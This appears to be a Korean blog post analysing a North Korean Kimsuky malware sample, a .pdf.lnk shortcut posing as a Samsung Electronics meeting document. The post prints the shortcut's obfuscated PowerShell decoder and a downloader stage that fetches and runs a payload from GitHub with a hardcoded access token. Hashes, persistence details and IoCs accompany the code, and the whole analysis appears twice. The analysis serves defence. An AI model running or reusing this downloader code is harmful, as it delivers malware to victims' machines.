김수키(Kimsuky)삼성전자 미팅 관련 으로 제작 악성코드(2025.9.11)
Contents
오늘도 경애하고 존경하는 박신 주의 정신을 가지고 북한 해킹 그룹 김수키(Kimsuky)에서 만든 악성코드인 삼성전자 미팅 관련 악성코드를 분석을 해보겠습니다.
해시
파일명:삼성전자 미팅 관련.pdf.lnk
사이즈:7,718 Bytes
MD5:f2d65a516a9f68487f1fb417f0f20314
SHA-1:e0d6de68f6bad27f668a6da26a6a8cb0899375a0
SHA-256:21a20215102f44ee2f47c21791ec5e6db40cf18484dab1f24890bb99ab08f6e9
악성코드에 포함된 코드
StringData
{
namestring: Type: Hangul Document
Size: 2.84 KB
Date modified: 10/20/2023 11:23
relativepath: not present
workingdir: not present
commandlinearguments:
"$bvnsekijhbd = \"JG......\";$bewrsdf=\"ABCDEFGHIJKLMNOP
QRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";$bvnsekijhbd=$b
v(n)sekijhbd.TrimEnd('=');$btks=New-Object System.Colle()ctions.Generic.Li
st[Byte];for($i=0;$i -lt $bvnsekijhbd.Length;$i+=4){$yhsd=$(b)vnsekijhbd.Substring($i
,[Math]::Min(4,$bvnsekijhbd.Length-$i));$vds=0;$yhsdLen = $yhsd.Length;foreach($c in $
yhsd(.)ToCharArray()){$vds=($vds -shl 6) -bor $bewrsdf.IndexOf($c);};for ($j=16; $j -g
e 0;$j -= 8){if((($i*6)/8)+(3-$j/8) -lt (($bvnsekijhbd.Length*6)/8)){$btks.Add([byte](
($vds -shr $j) -band 0xFF));}}};$dcdsg1=[System.Text.Encoding]::UTF8(.)GetString($btks
.ToArray());$cty67sx1=[System.IO.Path]::GetTempPath();$esiu231=\"7hweuyd(.)ps1\";$dsvu
1=Join-Path $cty67sx1 $esiu231;$dcdsg1|Out-File -FilePath $dsvu(1);powershell -windows
tyle hidden -ExecutionPolicy Bypass $dsvu1"
iconlocation: %ProgramFiles%\\Google\\Chrome\\Application\\chrome(.)exe
악성코드 분석
기본 구조
1. 문자열 $bvnsekijhbd에 base64 비슷한 인코딩 데이터를 집어넣음
2. 디코딩된 내용을 UTF-8 문자열로 변환->임시 폴더에 7hweuyd.ps1 파일로 저장
3.powershell -windowstyle hidden -ExecutionPolicy Bypass로 숨김 실행
다운로더를 수행을 하는 악성코드
임시 경로에 PDF로 위장한 파일 생성
다운로드 대상
hxxp (+) s://githubusercontent(.)com/…/lead/ohun/main/temp(.)pdf
깃허브 raw CDN 활용
실제 저장 & 실행
다운로드한 파일을 chrome(.)ps1,temp(.)ps1,system_first(.)ps1 등으로 임시 폴더에 저장
실행 후 흔적 삭제
지속성 확보
MicrorfteguesoftUpdata1logiveKentwuerwtySchule:윈도우 작업 스케줄러를 등록해서 지속성 확보
Base64 디코딩
$hhh=Join-Path ([System.IO.Path]::GetTempPath()) "삼성전자 미팅 관련(.)pdf"
;$tkf="ghp_ie2K2MqoBfSH(S)H7Kc64SuiqcCeG3372UL3d3";$bstr="ht"(+)"t"(+)"ps"+":"(+
)"/"(+)"/r"+"a"+"w(.)git"(+)"hub"(+)"user"(+)"cont"(+)"ent"+".com/"+"entire"+"73
"(+)"/leed"(+)"ohun/m"?"ain/";$rstr=$bstr+"tmp(.)pdf";$hrs = @{Authorization="to
ken $tkf";srjidc="ds(g)hjkgekjhgegegegr";Accept="application/vnd(.)github(.)v3(.)
raw"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join
-Path ($env:A(pp)Data) "chrome.ps1"; $str = '$aaa = …
해시
파일명:삼성전자 미팅 관련.pdf.lnk
사이즈:7,718 Bytes
MD5:f2d65a516a9f68487f1fb417f0f20314
SHA-1:e0d6de68f6bad27f668a6da26a6a8cb0899375a0
SHA-256:21a20215102f44ee2f47c21791ec5e6db40cf18484dab1f24890bb99ab08f6e9
악성코드에 포함된 코드
StringData
{
namestring: Type: Hangul Document
Size: 2.84 KB
Date modified: 10/20/2023 11:23
relativepath: not present
workingdir: not present
commandlinearguments:
"$bvnsekijhbd = \"JG......\";$bewrsdf=\"ABCDEFGHIJKLMNOP
QRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";$bvnsekijhbd=$b
v(n)sekijhbd.TrimEnd('=');$btks=New-Object System.Colle()ctions.Generic.Li
st[Byte];for($i=0;$i -lt $bvnsekijhbd.Length;$i+=4){$yhsd=$(b)vnsekijhbd.Substring($i
,[Math]::Min(4,$bvnsekijhbd.Length-$i));$vds=0;$yhsdLen = $yhsd.Length;foreach($c in $
yhsd(.)ToCharArray()){$vds=($vds -shl 6) -bor $bewrsdf.IndexOf($c);};for ($j=16; $j -g
e 0;$j -= 8){if((($i*6)/8)+(3-$j/8) -lt (($bvnsekijhbd.Length*6)/8)){$btks.Add([byte](
($vds -shr $j) -band 0xFF));}}};$dcdsg1=[System.Text.Encoding]::UTF8(.)GetString($btks
.ToArray());$cty67sx1=[System.IO.Path]::GetTempPath();$esiu231=\"7hweuyd(.)ps1\";$dsvu
1=Join-Path $cty67sx1 $esiu231;$dcdsg1|Out-File -FilePath $dsvu(1);powershell -windows
tyle hidden -ExecutionPolicy Bypass $dsvu1"
iconlocation: %ProgramFiles%\\Google\\Chrome\\Application\\chrome(.)exe
악성코드 분석
기본 구조
1. 문자열 $bvnsekijhbd에 base64 비슷한 인코딩 데이터를 집어넣음
2. 디코딩된 내용을 UTF-8 문자열로 변환->임시 폴더에 7hweuyd.ps1 파일로 저장
3.powershell -windowstyle hidden -ExecutionPolicy Bypass로 숨김 실행
다운로더를 수행을 하는 악성코드
임시 경로에 PDF로 위장한 파일 생성
다운로드 대상
hxxp (+) s://githubusercontent(.)com/…/lead/ohun/main/temp(.)pdf
깃허브 raw CDN 활용
실제 저장 & 실행
다운로드한 파일을 chrome(.)ps1,temp(.)ps1,system_first(.)ps1 등으로 임시 폴더에 저장
실행 후 흔적 삭제
지속성 확보
MicrorfteguesoftUpdata1logiveKentwuerwtySchule:윈도우 작업 스케줄러를 등록해서 지속성 확보
Base64 디코딩
$hhh=Join-Path ([System.IO.Path]::GetTempPath()) "삼성전자 미팅 관련(.)pdf"
;$tkf="ghp_ie2K2MqoBfSH(S)H7Kc64SuiqcCeG3372UL3d3";$bstr="ht"(+)"t"(+)"ps"+":"(+
)"/"(+)"/r"+"a"+"w(.)git"(+)"hub"(+)"user"(+)"cont"(+)"ent"+".com/"+"entire"+"73
"(+)"/leed"(+)"ohun/m"?"ain/";$rstr=$bstr+"tmp(.)pdf";$hrs = @{Authorization="to
ken $tkf";srjidc="ds(g)hjkgekjhgegegegr";Accept="application/vnd(.)github(.)v3(.)
raw"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join
-Path ($env:A(pp)Data) "chrome.ps1"; $str = '$aaa = …
IoC
21a20215102f44ee2f47c21791ec5e6db40cf18484dab1f24890bb99ab08f6e9
e0d6de68f6bad27f668a6da26a6a8cb0899375a0
f2d65a516a9f68487f1fb417f0f20314
e0d6de68f6bad27f668a6da26a6a8cb0899375a0
f2d65a516a9f68487f1fb417f0f20314